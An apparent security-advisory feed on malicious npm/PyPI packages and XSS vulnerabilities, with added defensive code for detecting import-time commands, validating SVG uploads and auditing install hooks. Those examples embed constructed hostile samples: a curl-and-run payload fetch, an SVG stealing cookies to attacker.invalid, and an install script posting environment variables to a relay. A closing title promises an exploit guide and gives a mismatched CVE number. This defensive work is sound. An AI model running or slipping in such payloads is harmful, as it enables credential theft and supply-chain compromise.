CVE-2026-9302 546669204 vps-inventory-monitoring VpsTest Console VpsTest.php eval code injection
A vulnerability was determined in 546669204 vps-inventory-monitoring up to 98c00b370668c96ae75e91c15548d9ea113652d9. This issue affects the function eval of the file app/index/command/VpsTest.php of the component VpsTest Console. Executing a manipulation of the argument vf can lead to code...
Cross-site Scripting (XSS)
ci4-cms-erp/ci4ms is vulnerable to Cross-site Scripting XSS. The vulnerability is due to improper sanitization and escaping of user-supplied page content before rendering, which allows an attacker to inject malicious scripts that execute in the browsers of visitors and administrators viewing the...
Malicious code in dds-js-idl-types (npm)
Source: amazon-inspector 68e8941c301603919022f1d67d311d576d5d5efcac7ed7cb0d3526cb71e829d6. On npm install, the package's postinstall.js runs whoami and reads os.hostname, os.platform, the current working directory, and CI-related environmen...
CVE-2026-41147
NukeViet CMS is a multi Content Management System. Versions 4.5.07 and prior contain a Stored Cross-Site Scripting XSS vulnerability caused by insufficient server-side input sanitization in the Request class. The application relies primarily on client-side filtering to sanitize HTML tags and...
MAL-2026-4262 Malicious code in solidity-build-guard (PyPI)
Source: amazon-inspector be62d73f7e4a6307ec5f0bac9b9543f9d73da696a4e67233057f77fd3cb6481c. On import of soliditybuildguard, the top-level __init__.py (lines 11-24) shells out to curl to download a JavaScript file from a personal GitHub Pages URL...
MAL-2026-4260 Malicious code in defi-risk-scanner (PyPI)
Source: amazon-inspector 5a8385c44127ab4250664e1324009461ae329e3684948d692cc679962d59f818. On first import of defiriskscanner, the package's top-level __init__.py unconditionally runs curl -sL...
MAL-2026-4261 Malicious code in eth-security-auditor (PyPI)
Source: amazon-inspector 8e20bc5304d65563ad8b577a38c26db0b04746828b554f88cf5dd1215a214cf1. On import, ethsecurityauditor/__init__.py unconditionally fetches a JavaScript payload from...
Malicious code in cryptowallet-safety (PyPI)
Source: amazon-inspector 276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d. On import of cryptowalletsafety, the top-level __init__.py (lines 13-21) shells out to curl -sL...
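The four PyPI entries above (solidity-build-guard, defi-risk-scanner, eth-security-auditor, cryptowallet-safety) share one mechanism: the package's top-level `__init__.py` runs a shell command or fetches remote content the moment the package is imported, so no function of the advertised API ever has to be called. The static check below is an added example, not the advisories' or any package's own tooling. It parses a module with the stdlib `ast`, resolves import aliases so `sp.run` and `from os import system` are both recognised, and separates calls that fire at import time from calls that sit inside function bodies. The sample `__init__.py` source and its URLs are constructed for the example.

```python
"""Static check for a PyPI package that runs commands or fetches remote content
when imported. Added example; not the advisories' or any package's own code.
The sample __init__.py source below is constructed and its URLs are fictional."""
import ast
from dataclasses import dataclass
from typing import Optional

# (module, function) pairs that execute a subprocess or open a network connection.
EXEC_CALLS = {("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
              ("subprocess", "check_output"), ("os", "system"), ("os", "popen")}
NET_CALLS = {("urllib.request", "urlopen"), ("requests", "get"), ("socket", "create_connection")}
DOWNLOADERS = ("curl", "wget")


@dataclass
class Finding:
    lineno: int
    call: str          # resolved target, e.g. "subprocess.run"
    kind: str          # "exec", "remote-fetch" (curl/wget via exec) or "network"
    at_import: bool    # True when the call runs from module-level code
    command: Optional[str]


def _string_arg(call: ast.Call) -> Optional[str]:
    """First positional argument when it is a literal string or a list of them."""
    if not call.args:
        return None
    a = call.args[0]
    if isinstance(a, ast.Constant) and isinstance(a.value, str):
        return a.value
    if isinstance(a, (ast.List, ast.Tuple)) and all(
            isinstance(e, ast.Constant) and isinstance(e.value, str) for e in a.elts):
        return " ".join(e.value for e in a.elts)
    return None


class ImportTimeScanner(ast.NodeVisitor):
    """Resolves import aliases (so `sp.run` and `from os import system` are both seen)
    and records whether each dangerous call is reachable from module-level code."""

    def __init__(self) -> None:
        self.module_alias: dict = {}   # local name -> imported module
        self.name_alias: dict = {}     # local name -> (module, attribute)
        self.depth = 0                 # > 0 inside function bodies
        self.findings: list = []

    def visit_Import(self, node: ast.Import) -> None:
        for a in node.names:
            self.module_alias[a.asname or a.name] = a.name

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        for a in node.names:
            self.name_alias[a.asname or a.name] = (node.module, a.name)

    def _deferred(self, node: ast.AST) -> None:
        # Decorators and default values are evaluated at definition time, i.e. on
        # import; only the body waits for a call. Class bodies run on import too,
        # so ClassDef is deliberately not treated as deferred.
        for expr in getattr(node, "decorator_list", []):
            self.visit(expr)
        for default in node.args.defaults + node.args.kw_defaults:
            if default is not None:
                self.visit(default)
        self.depth += 1
        for child in node.body if isinstance(node.body, list) else [node.body]:
            self.visit(child)
        self.depth -= 1

    visit_FunctionDef = visit_AsyncFunctionDef = visit_Lambda = _deferred

    def visit_Call(self, node: ast.Call) -> None:
        f, target = node.func, None
        if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
            target = (self.module_alias.get(f.value.id, f.value.id), f.attr)
        elif isinstance(f, ast.Name):
            target = self.name_alias.get(f.id)
        if target in EXEC_CALLS or target in NET_CALLS:
            kind = "exec" if target in EXEC_CALLS else "network"
            cmd = _string_arg(node)
            if kind == "exec" and cmd and cmd.split()[0] in DOWNLOADERS:
                kind = "remote-fetch"
            self.findings.append(Finding(node.lineno, ".".join(target), kind, self.depth == 0, cmd))
        self.generic_visit(node)


def scan_source(source: str) -> list:
    scanner = ImportTimeScanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


def import_time_risks(source: str) -> list:
    """Only the calls that fire on `import pkg`: anything that imports the package
    (an IDE, a test runner, a transitive dependency) triggers them."""
    return [f for f in scan_source(source) if f.at_import]


# Constructed sample in the shape of the advisories: a plausible API plus an
# unconditional module-level curl-and-run.
SAMPLE_INIT = '''\
import os
import subprocess as sp
from urllib.request import urlopen

__version__ = "1.0.0"

def scan(path):
    return os.path.getsize(path)

def update():
    return urlopen("https://example.invalid/v").read()

sp.run(["curl", "-sL", "https://example.invalid/p.js", "-o", "/tmp/p.js"])
os.system("node /tmp/p.js &")
'''

if __name__ == "__main__":
    for f in import_time_risks(SAMPLE_INIT):
        print(f"line {f.lineno}: {f.call} [{f.kind}] {f.command!r}")
```

Run against the sample, the scanner reports the `curl` download and the `os.system` launch as import-time risks while the `urlopen` inside `update()` is recorded but not flagged, which is the distinction a triage queue needs: a network call behind an explicit API is ordinary, a network call on import is not. Calls reached through `getattr`, string-built commands or a helper module are outside what this single-file pass sees; in practice the check runs over every module in the wheel or sdist before it is installed into an environment that matters.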
EUVD-2026-31496
Mantis Bug Tracker MantisBT is an open source issue tracker. In versions 2.28.1 and below, given any pre-existing XSS / HTML injection vulnerability, an attacker can bypass the Content Security Policy's script-src directive by uploading a crafted attachment to any issue that, when accessed via th...
MAL-2026-4636 Malicious code in peertube-plugin-google-analytics-js (npm)
Source: amazon-inspector 3c66b6ebad55556f956fbc181293327eb4051d2ec6de6436a24d027fac58e580. This PeerTube plugin advertises itself as a Google Analytics integration, but its client-side script client/common-client-plugin.js:8 registers a...
EUVD-2026-31481
TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the fix for GHSA-4xc5-wfwc-jw47 "Credential Theft via Client-Side Script Execution and API Authorization Bypass" is incomplete. While the builder's getCredentials tRPC endpoint was patched with workspace membership checks, the...
EUVD-2026-31478
TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain a critical stored XSS vulnerability in the app.typebot.io profile picture upload form. The application fails to sanitize or restrict SVG/XML-based uploads and directly renders them when accessed through the domain. By uploading ...
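EUVD-2026-31478 and EUVD-2026-31496 above are two faces of the same upload problem: an SVG is an XML document that can carry script and event handlers, and a user-supplied attachment served back by the application can be turned against its own Content Security Policy. The code below is an added example, not TypeBot's or MantisBT's code. It validates an uploaded SVG with the stdlib `xml.etree` parser (defusedxml is the safer choice in production) and picks response headers so that even a file that passes is rendered under a CSP sandbox rather than in the application origin. The sample SVG documents, the `attacker.invalid` host and the `stored_name` convention (a server-generated filename, not the client's) are assumptions of the example.

```python
"""Validate an uploaded SVG before it is stored, and choose headers for serving
user uploads so a file that slips through cannot run script in the application
origin. Added example, not TypeBot's or MantisBT's code; the sample SVG
documents are constructed. Uses the stdlib parser; defusedxml is the safer
choice in production."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that carry script or embed foreign documents.
BLOCKED_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
# Schemes that execute or render HTML when used in href/src (leading control chars tolerated).
_URL_SCHEME = re.compile(r"^[\s\x00-\x1f]*((javascript|vbscript)\s*:|data:\s*text/html)", re.I)


def _local(name: str) -> str:
    """Strip the `{namespace}` prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def check_svg(data: bytes, max_bytes: int = 512_000) -> list:
    """Return a list of problems; an empty list means the SVG passed every check."""
    if len(data) > max_bytes:
        return ["file exceeds size limit"]
    # Reject DTDs outright: entity expansion is the classic XML parser DoS.
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        return ["doctype/entity declarations not allowed"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    problems = []
    if root.tag != f"{{{SVG_NS}}}svg":
        problems.append(f"root element is {root.tag!r}, expected an svg element")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in BLOCKED_TAGS:
            problems.append(f"<{tag}> element not allowed")
        for name, value in el.attrib.items():
            attr = _local(name)
            if attr.lower().startswith("on"):
                problems.append(f"event handler {attr} on <{tag}>")
            elif attr in ("href", "src") and _URL_SCHEME.match(value):
                problems.append(f"active URL scheme in {attr} on <{tag}>")
    return problems


def upload_response_headers(stored_name: str, validated: bool) -> dict:
    """Headers for serving a user upload. `stored_name` is assumed to be a
    server-generated name, never the client's filename. A validated SVG is served
    inline but under a CSP sandbox (opaque origin, no script); anything
    unvalidated goes out as a download with a non-executable type."""
    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }
    if validated:
        headers["Content-Type"] = "image/svg+xml"
        headers["Content-Disposition"] = f'inline; filename="{stored_name}"'
    else:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{stored_name}"'
    return headers


# Constructed samples: a plain icon and one in the shape of a stored-XSS payload
# (script element, javascript: link, event handler). The host is fictional.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              b'<circle cx="5" cy="5" r="4" fill="#09c"/></svg>')
MALICIOUS_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>
<a xlink:href="javascript:alert(1)"><text y="20" onload="alert(2)">hi</text></a>
</svg>'''

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        problems = check_svg(doc)
        print(label, "->", problems or "ok",
              upload_response_headers("u.svg", not problems)["Content-Disposition"])
```

The validator is a denylist on the parts of SVG that execute, which is enough to catch the payload shapes in the advisories but is not a substitute for serving uploads from a separate origin: the headers function is what keeps a missed case from running as the application, because a sandboxed document with `default-src 'none'` has no script and no access to the app's cookies or storage, and a download-disposition response cannot be navigated to as a page at all.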
MAL-2026-4692 Malicious code in thevoid (npm)
Source: amazon-inspector 0ce4d125de5d699da897d074134f8d1f0a971aa23d9c3d6ff3330015fccad091. On install, postinstall.js performs an HTTPS request to void-relay.com carrying process.env contents along with host identifiers process.platform,...
Malicious code in osep-api-hub-service-client-v1 (npm)
Source: amazon-inspector cd131719d20e013a4627e1ea402ffc26135d66a5d6dd35669b8a3a6fb85e5f76. package.json declares "preinstall": "node index.js", causing index.js to run automatically on npm install. index.js collects host identifiers...
MAL-2026-4668 Malicious code in share-anything-cli (npm)
Source: amazon-inspector 290f9dadaf589349dd8a7c641450aca713a6ead63b2ba685c15e4e6a37ab3b07. The package's package.json declares a postinstall lifecycle hook "postinstall": "node install.js" that runs install.js automatically on npm install...
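The npm entries on this page (dds-js-idl-types, thevoid, osep-api-hub-service-client-v1, share-anything-cli) all hang off one package.json feature: a preinstall or postinstall script that npm runs for every installer, which collects host identifiers, environment variables and CI markers and posts them to a relay. The audit below is an added example, not the advisories' or any package's own code. It reads a package's `scripts`, resolves `node <file>` hooks to the file inside the tarball, and scans that file with a handful of regex signals for the collect-and-send pattern. The package.json, the install.js body and the `relay.invalid` host are constructed for the example; the `files` mapping stands in for a tarball listing.

```python
"""Audit an npm package for install-time lifecycle hooks and for what the hooked
script does. Added example, not the advisories' or any package's own code; the
package.json and install.js below are constructed and the relay host is fictional."""
import json
import re
from dataclasses import dataclass
from typing import Optional

# Scripts npm runs automatically on install (prepare: local and git installs).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic signals, reported in this order.
SIGNALS = {
    "env-read": re.compile(r"process\.env\b"),
    "host-fingerprint": re.compile(
        r"\bos\.(hostname|platform|userInfo|networkInterfaces)\s*\("
        r"|\bprocess\.(platform|arch|cwd)\b|\bwhoami\b"),
    "ci-detect": re.compile(
        r"process\.env\.(CI|GITHUB_ACTIONS|GITLAB_CI|BUILDKITE|JENKINS_URL|TRAVIS)\b"),
    "shell-exec": re.compile(r"child_process|\b(exec|spawn|execFile)(Sync)?\s*\("),
    "network": re.compile(
        r"\bhttps?\.(request|get)\s*\(|\bfetch\s*\(|\bnew\s+WebSocket\b|\bdns\.resolve"),
}


@dataclass
class HookFinding:
    hook: str
    command: str
    script: Optional[str]   # local file the hook runs, when the command is `node <file>`
    signals: list


def resolve_script(command: str) -> Optional[str]:
    """`node install.js` / `node ./scripts/x.mjs` -> path inside the package; else None."""
    m = re.fullmatch(r"node\s+(?:\./)?([\w./-]+\.[cm]?js)", command.strip())
    return m.group(1) if m else None


def audit_package(package_json: str, files: dict) -> list:
    """`files` maps paths inside the tarball to their text; only hooked scripts are read."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        if hook not in scripts:
            continue
        command = scripts[hook]
        script = resolve_script(command)
        if script is None:
            body = command                     # inline shell command: scan it directly
        elif script in files:
            body = files[script]
        else:
            findings.append(HookFinding(hook, command, script, ["missing-script"]))
            continue
        signals = [name for name, rx in SIGNALS.items() if rx.search(body)]
        findings.append(HookFinding(hook, command, script, signals))
    return findings


def exfil_hooks(findings: list) -> list:
    """Hooks that both collect host/environment data and talk to the network."""
    return [f.hook for f in findings
            if "network" in f.signals and {"env-read", "host-fingerprint"} & set(f.signals)]


# Constructed sample in the shape of the advisories: a postinstall hook whose
# script fingerprints the host, reads the environment and posts it to a relay.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "sample-cli", "version": "1.0.3",
    "scripts": {"postinstall": "node install.js", "test": "node test.js"},
})
SAMPLE_FILES = {
    "install.js": """\
const os = require("os");
const https = require("https");
const { execSync } = require("child_process");
const info = {
  user: execSync("whoami").toString().trim(),
  host: os.hostname(), platform: process.platform, cwd: process.cwd(),
  ci: process.env.CI || process.env.GITHUB_ACTIONS || null,
  env: process.env,
};
const req = https.request({ host: "relay.invalid", method: "POST", path: "/i" });
req.end(JSON.stringify(info));
""",
}

if __name__ == "__main__":
    findings = audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES)
    for f in findings:
        print(f"{f.hook}: {f.command!r} -> {', '.join(f.signals) or 'no signals'}")
    print("exfiltration hooks:", exfil_hooks(findings))
```

A hook by itself is not evidence; native add-ons legitimately run `node-gyp rebuild` on install, and the audit reports such a hook with no signals. What marks the packages on this page is the combination: environment or host collection plus an outbound request from a script that has no reason to do either. Where the dependency set is not reviewed, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) removes the execution path entirely at the cost of breaking packages that genuinely need a build step.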
Exploit for CVE-2024-53667
CVE-2024-53677 — How the Exploit Works and How to Run It V...